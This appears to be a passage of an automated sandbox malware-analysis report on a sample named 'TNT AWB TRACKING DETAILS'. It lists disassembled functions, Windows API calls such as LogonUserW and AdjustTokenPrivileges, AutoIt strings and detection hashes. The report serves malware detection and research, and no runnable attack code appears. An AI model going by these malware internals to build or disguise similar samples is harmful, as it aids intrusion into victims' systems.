                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                    • String ID:
                                                    • API String ID: 3429775523-0
                                                    • Opcode ID: 2e0f7dfc6e188f5690afd71f97425b00a4b101f6e1fc9888727f6ab92985f49f
                                                    • Instruction ID: a8f3089816b7cb65c505bc84c3957b247e46c72eeea7db538463797988d31b7d
                                                    • Opcode Fuzzy Hash: 2e0f7dfc6e188f5690afd71f97425b00a4b101f6e1fc9888727f6ab92985f49f
                                                    • Instruction Fuzzy Hash: B8F04F7591130CBFEF00DFF4DD89AAEB7BCEF08311F104469A905E2181D6715A489B50
                                                    Function 00F24C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F24CB3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID: DOWN
                                                    • API String ID: 2434400541-711622031
                                                    • Opcode ID: e9aa9522bab2ef59d0b5aed2276c2e10b1655645e6fc786f0238ff6d1ca62435
                                                    • Instruction ID: 611edddeabf0dfd12fab0897757c92a82b71cca087fae9b41771db15608e4ec8
                                                    • Opcode Fuzzy Hash: e9aa9522bab2ef59d0b5aed2276c2e10b1655645e6fc786f0238ff6d1ca62435
                                                    • Instruction Fuzzy Hash: 41E046362ED73138B9442929BC02EB7128C8B22331B10020AFC18E94C1EE807C8274BA
                                                    Function 00F2C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F2C6FB
                                                    • FindClose.KERNEL32(00000000), ref: 00F2C72B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 86778c3fbe9a2b830f309ad07b0098d5365292ccdbf090395bc778620cdca7e9
                                                    • Instruction ID: 5edc8934fed1a8da5e2d7f72b4cdb46ffd34961fe86b893339265ac0d72871d2
                                                    • Opcode Fuzzy Hash: 86778c3fbe9a2b830f309ad07b0098d5365292ccdbf090395bc778620cdca7e9
                                                    • Instruction Fuzzy Hash: 0C118E766006049FDB10DF29D849A2AF7E9FF85324F00851DF9A9D7291DB30A805DB81
                                                    Function 00F2A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F39468,?,00F4FB84,?), ref: 00F2A097
                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F39468,?,00F4FB84,?), ref: 00F2A0A9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: 12b9fda16206da54433d889523f7e0451d9222d420e7f7d64d244ebbc2b79640
                                                    • Instruction ID: 978cc404c9b53b4a5fe769c22d9dbca159f4a9fda81ef7a578348e600b982f50
                                                    • Opcode Fuzzy Hash: 12b9fda16206da54433d889523f7e0451d9222d420e7f7d64d244ebbc2b79640
                                                    • Instruction Fuzzy Hash: F1F0823650522DABDB219FA4DC48FEA776CBF09361F008265F909D6181D6709A44DBA1
                                                    Function 00F181CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F18309), ref: 00F181E0
                                                    • CloseHandle.KERNEL32(?,?,00F18309), ref: 00F181F2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                    • String ID:
                                                    • API String ID: 81990902-0
                                                    • Opcode ID: 1bd92185b9efca0a52a9a6948bdc6658bd35f4793136b10efbf281fb99846645
                                                    • Instruction ID: 75367aa2f81fb08874a048b9343b1a2a20f0e7bb43bf8604a6861ccd9a4a6ede
                                                    • Opcode Fuzzy Hash: 1bd92185b9efca0a52a9a6948bdc6658bd35f4793136b10efbf281fb99846645
                                                    • Instruction Fuzzy Hash: B7E0EC76010614AFEB262B65EC09D777BEAEF04360714983DF8AA94470DB62ACD1EB10
                                                    Function 00EEA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EE8D57,?,?,?,00000001), ref: 00EEA15A
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00EEA163
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 57b9fff9170dcf26d02d71885df27a44b68d152523c9efbb35938cdb6baedf20
                                                    • Instruction ID: cd2684d1a78e2249e312cd68fea085466ef87efd38bcc0cf798b7819528359e1
                                                    • Opcode Fuzzy Hash: 57b9fff9170dcf26d02d71885df27a44b68d152523c9efbb35938cdb6baedf20
                                                    • Instruction Fuzzy Hash: B1B0923505420CABCA002F91EC09FA83F68EB56AA2F404020FA0D84060CB625454AA91
                                                    Function 00EEF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5ccaaae903eedf9e78ea8868f1296c5ee70db8721d0865e2dee2b9a821f0625f
                                                    • Instruction ID: 55a08bb46c15d5f989c00c12c98075ec8c85ca69a425903e045b76a279cb0b8a
                                                    • Opcode Fuzzy Hash: 5ccaaae903eedf9e78ea8868f1296c5ee70db8721d0865e2dee2b9a821f0625f
                                                    • Instruction Fuzzy Hash: 64323521D29F494DD7239635D832335A288AFF73C9F15E737E81AB59AAEB29C4835100
                                                    Function 00EF242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a493abc08c81439ec3ce56d377d9237d9a45d77621334d9d6a52da0e2bfb27a9
                                                    • Instruction ID: df3ef1d019ba996e893fd5e0ca505fdcaa245069f83dd5cad09882e77458eb5f
                                                    • Opcode Fuzzy Hash: a493abc08c81439ec3ce56d377d9237d9a45d77621334d9d6a52da0e2bfb27a9
                                                    • Instruction Fuzzy Hash: 30B10230E2AF454DD32396398831336BA5CAFBB2CAF51D71BFD2674D22EB2285935141
                                                    Function 00F28889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __time64.LIBCMT ref: 00F2889B
                                                      • Part of subcall function 00EE520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F28F6E,00000000,?,?,?,?,00F2911F,00000000,?), ref: 00EE5213
                                                      • Part of subcall function 00EE520A: __aulldiv.LIBCMT ref: 00EE5233
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                    • String ID:
                                                    • API String ID: 2893107130-0
                                                    • Opcode ID: 87d1e532bf004a44e4d8beab89a97da68812e4a99cdf73ff64098b839dd84227
                                                    • Instruction ID: dcb017d3a7f6b51b86c5cb580fb3287a9905eff05da186a6b020964fafc8c19e
                                                    • Opcode Fuzzy Hash: 87d1e532bf004a44e4d8beab89a97da68812e4a99cdf73ff64098b839dd84227
                                                    • Instruction Fuzzy Hash: 1A21B732A355108BC729CF25D841A91B3E1EFA5321F688E6CD1F5CF2D0CA34B905DB54
                                                    Function 00F187B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F18389), ref: 00F187D1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: d7df4113e68e48d09df7ccd4c1d559331cdbe8800a849094cd05b47f41824473
                                                    • Instruction ID: b0095f5b02b85f4a5e3aa5813d3f11ff9867e0fb67867fb599d156f51798173e
                                                    • Opcode Fuzzy Hash: d7df4113e68e48d09df7ccd4c1d559331cdbe8800a849094cd05b47f41824473
                                                    • Instruction Fuzzy Hash: 41D05E3226050EABEF018EA8DC01EAF3B69EB04B01F408111FE15C50A1C775D835AB60
                                                    Function 00EEA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00EEA12A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 0dcc5f2cccce1d9ab21058f2c46bf93ad267f7eac221c657d3f107639fd3acdd
                                                    • Instruction ID: 2787f0ed82edd21945a292917c57ca5c31be515d6a5b592333119c7a54b3b72e
                                                    • Opcode Fuzzy Hash: 0dcc5f2cccce1d9ab21058f2c46bf93ad267f7eac221c657d3f107639fd3acdd
                                                    • Instruction Fuzzy Hash: 89A0113000020CAB8A002F82EC088A8BFACEA02AA0B008020F80C800228B32A820AA80
                                                    Function 00ED8808 Relevance: .6, Instructions: 590COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 98848af307c74756287dcdb4bc49f08220220f3990afa70f3eac603fa3957036
                                                    • Instruction ID: ae6484c24b91aba6a4620f06d89ffecaa4209e6e38d417073ba4a57cc30599f1
                                                    • Opcode Fuzzy Hash: 98848af307c74756287dcdb4bc49f08220220f3990afa70f3eac603fa3957036
                                                    • Instruction Fuzzy Hash: EE225731904146CBCF388B64C5A47BC77A1FBC1718F68906BD89AAB692DB70DDC2E741
                                                    Function 00EE21C5 Relevance: .3, Instructions: 345COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction ID: 6398348a2dac34a92f0e9eeb50fc9beffd2cb88f8a307f29a320aca3bc9c1b7d
                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                    • Instruction Fuzzy Hash: E5C18A322051D709DF2D4A3B883403EFBA55EA27B631A279DD5B3EB1D4EE20C9B5D610
                                                    Function 00EE25FA Relevance: .3, Instructions: 341COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction ID: 74e5bd55a6fe265aae52abb96266ae24bef2d05a73a212b3c9a476764a8d9d5b
                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                    • Instruction Fuzzy Hash: 5BC197322051D709DF2D4A3BC83403EBBA55EA27B631A27ADD4B2EB1D5EE20C975D610
                                                    Function 00EE1978 Relevance: .3, Instructions: 323COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: a24a63e51abed358b7acbc90a1e474d30eb2410ae94e94b3a0b7685470bd626a
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 4AC173322051D749DF2D463B887413EFAA15EA27B631A27EDD4B2EB1C4EE30C9B5D610
                                                    Function 00F37806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 00F3785B
                                                    • DeleteObject.GDI32(00000000), ref: 00F3786D
                                                    • DestroyWindow.USER32 ref: 00F3787B
                                                    • GetDesktopWindow.USER32 ref: 00F37895
                                                    • GetWindowRect.USER32(00000000), ref: 00F3789C
                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F379DD
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F379ED
                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37A35
                                                    • GetClientRect.USER32(00000000,?), ref: 00F37A41
                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F37A7B
                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37A9D
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AB0
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37ABB
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F37AC4
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AD3
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F37ADC
                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37AE3
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F37AEE
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37B00
                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F52CAC,00000000), ref: 00F37B16
                                                    • GlobalFree.KERNEL32(00000000), ref: 00F37B26
                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F37B4C
                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F37B6B
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37B8D
                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F37D7A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 2211948467-2373415609
                                                    • Opcode ID: 49fde2b7238490de3d16a3f177236bc431ca7600b07804dd4fbc891be012040f
                                                    • Instruction ID: 520d9673e843096c35f24dce5ed358630643dd01a346b4e91bf31482b32c5120
                                                    • Opcode Fuzzy Hash: 49fde2b7238490de3d16a3f177236bc431ca7600b07804dd4fbc891be012040f
                                                    • Instruction Fuzzy Hash: 90026D75900219EFDB14DFA4DD89EAE7BB9FF49720F148158F905AB2A1CB30AD01DB60
                                                    Function 00F4356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,00F4F910), ref: 00F43627
                                                    • IsWindowVisible.USER32(?), ref: 00F4364B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
